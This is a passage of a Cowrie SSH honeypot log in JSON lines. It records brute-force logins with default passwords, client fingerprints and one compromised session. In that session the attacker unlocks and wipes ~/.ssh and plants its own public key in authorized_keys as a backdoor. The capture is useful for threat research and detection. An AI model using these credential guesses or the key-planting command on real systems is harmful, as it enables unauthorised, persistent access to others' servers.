92-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:27:20.888767Z","src_ip":"134.199.174.250","session":"d025bc676df7"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin123","message":"login attempt [pi/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:27:22.003353Z","src_ip":"134.199.174.250","session":"d025bc676df7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:23.384882Z","src_ip":"134.199.174.250","session":"d025bc676df7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49094,"dst_ip":"1.2.3.4","dst_port":22,"session":"2da6166b8b99","protocol":"ssh","message":"New connection: 212.227.235.229:49094 (1.2.3.4:22) [session: 2da6166b8b99]","sensor":"my-vps","timestamp":"2025-09-08T13:27:26.646354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:27:26.651604Z","src_ip":"212.227.235.229","session":"2da6166b8b99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:27:26.970453Z","src_ip":"212.227.235.229","session":"2da6166b8b99"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"pass","message":"login attempt [elastic/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T13:27:28.231300Z","src_ip":"212.227.235.229","session":"2da6166b8b99"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:29.553285Z","src_ip":"212.227.235.229","session":"2da6166b8b99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44356,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ee927ddb3a","protocol":"ssh","message":"New connection: 212.227.235.229:44356 (1.2.3.4:22) [session: f1ee927ddb3a]","sensor":"my-vps","timestamp":"2025-09-08T13:27:29.811539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:27:29.812670Z","src_ip":"212.227.235.229","session":"f1ee927ddb3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:27:30.942402Z","src_ip":"212.227.235.229","session":"f1ee927ddb3a"}
{"eventid":"cowrie.login.failed","username":"acer","password":"111","message":"login attempt [acer/111] failed","sensor":"my-vps","timestamp":"2025-09-08T13:27:32.515058Z","src_ip":"212.227.235.229","session":"f1ee927ddb3a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:33.744610Z","src_ip":"212.227.235.229","session":"f1ee927ddb3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57714,"dst_ip":"1.2.3.4","dst_port":22,"session":"318cb9f5c009","protocol":"ssh","message":"New connection: 212.227.235.229:57714 (1.2.3.4:22) [session: 318cb9f5c009]","sensor":"my-vps","timestamp":"2025-09-08T13:27:38.837880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:27:38.838846Z","src_ip":"212.227.235.229","session":"318cb9f5c009"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:27:38.949352Z","src_ip":"212.227.235.229","session":"318cb9f5c009"}
{"eventid":"cowrie.login.failed","username":"debian","password":"azerty","message":"login attempt [debian/azerty] failed","sensor":"my-vps","timestamp":"2025-09-08T13:27:39.460171Z","src_ip":"212.227.235.229","session":"318cb9f5c009"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:40.564797Z","src_ip":"212.227.235.229","session":"318cb9f5c009"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58492,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd5eaac7565c","protocol":"ssh","message":"New connection: 134.199.174.250:58492 (1.2.3.4:22) [session: dd5eaac7565c]","sensor":"my-vps","timestamp":"2025-09-08T13:27:51.190820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:27:51.191649Z","src_ip":"134.199.174.250","session":"dd5eaac7565c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:27:51.591326Z","src_ip":"134.199.174.250","session":"dd5eaac7565c"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:27:52.379739Z","src_ip":"134.199.174.250","session":"dd5eaac7565c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:53.707694Z","src_ip":"134.199.174.250","session":"dd5eaac7565c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35130,"dst_ip":"1.2.3.4","dst_port":22,"session":"f475a4f2ebbd","protocol":"ssh","message":"New connection: 212.227.235.229:35130 (1.2.3.4:22) [session: f475a4f2ebbd]","sensor":"my-vps","timestamp":"2025-09-08T13:27:54.986219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:27:54.987018Z","src_ip":"212.227.235.229","session":"f475a4f2ebbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:27:55.104063Z","src_ip":"212.227.235.229","session":"f475a4f2ebbd"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx1234","message":"login attempt [nginx/nginx1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:27:55.610220Z","src_ip":"212.227.235.229","session":"f475a4f2ebbd"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:56.729052Z","src_ip":"212.227.235.229","session":"f475a4f2ebbd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62270,"dst_ip":"1.2.3.4","dst_port":22,"session":"36e179092d66","protocol":"ssh","message":"New connection: 217.72.205.35:62270 (1.2.3.4:22) [session: 36e179092d66]","sensor":"my-vps","timestamp":"2025-09-08T13:27:58.528605Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:27:58.529635Z","src_ip":"217.72.205.35","session":"36e179092d66"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":18009,"dst_ip":"1.2.3.4","dst_port":22,"session":"af552aef0be2","protocol":"ssh","message":"New connection: 49.247.35.31:18009 (1.2.3.4:22) [session: af552aef0be2]","sensor":"my-vps","timestamp":"2025-09-08T13:28:07.341385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:07.357878Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:07.620554Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.login.success","username":"root","password":"hedonism","message":"login attempt [root/hedonism] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:28:08.695876Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:28:09.293326Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:28:09.294020Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:28:09.295019Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:09.560701Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:28:10.115358Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:28:10.116015Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:28:10.400531Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:10.401372Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":40539,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f55eda68a66","protocol":"ssh","message":"New connection: 49.247.35.31:40539 (1.2.3.4:22) [session: 1f55eda68a66]","sensor":"my-vps","timestamp":"2025-09-08T13:28:10.693803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:10.699170Z","src_ip":"49.247.35.31","session":"1f55eda68a66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:10.983843Z","src_ip":"49.247.35.31","session":"1f55eda68a66"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:28:12.164854Z","src_ip":"49.247.35.31","session":"1f55eda68a66"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:13.457818Z","src_ip":"49.247.35.31","session":"1f55eda68a66"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":56926,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3ae9b7ab3e2","protocol":"ssh","message":"New connection: 49.247.35.31:56926 (1.2.3.4:22) [session: a3ae9b7ab3e2]","sensor":"my-vps","timestamp":"2025-09-08T13:28:13.741585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:28:13.761027Z","src_ip":"49.247.35.31","session":"a3ae9b7ab3e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:28:14.053780Z","src_ip":"49.247.35.31","session":"a3ae9b7ab3e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:28:15.215135Z","src_ip":"49.247.35.31","session":"a3ae9b7ab3e2"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:15.518207Z","src_ip":"49.247.35.31","session":"af552aef0be2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:28:15.519391Z","src_ip":"49.247.35.31","session":"a3ae9b7ab3e2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50128,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c20ef6ad5e1","protocol":"ssh","message":"New connection: 134.199.174.250:50128 (1.2.3.4:22) [session: 0c20ef6ad5e1]","sensor":"my-vps","timestamp":"2025-09-08T13:28:20.893138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:28:20.899483Z","src_ip":"134.199.174.250","session":"0c20ef6ad5e1"}
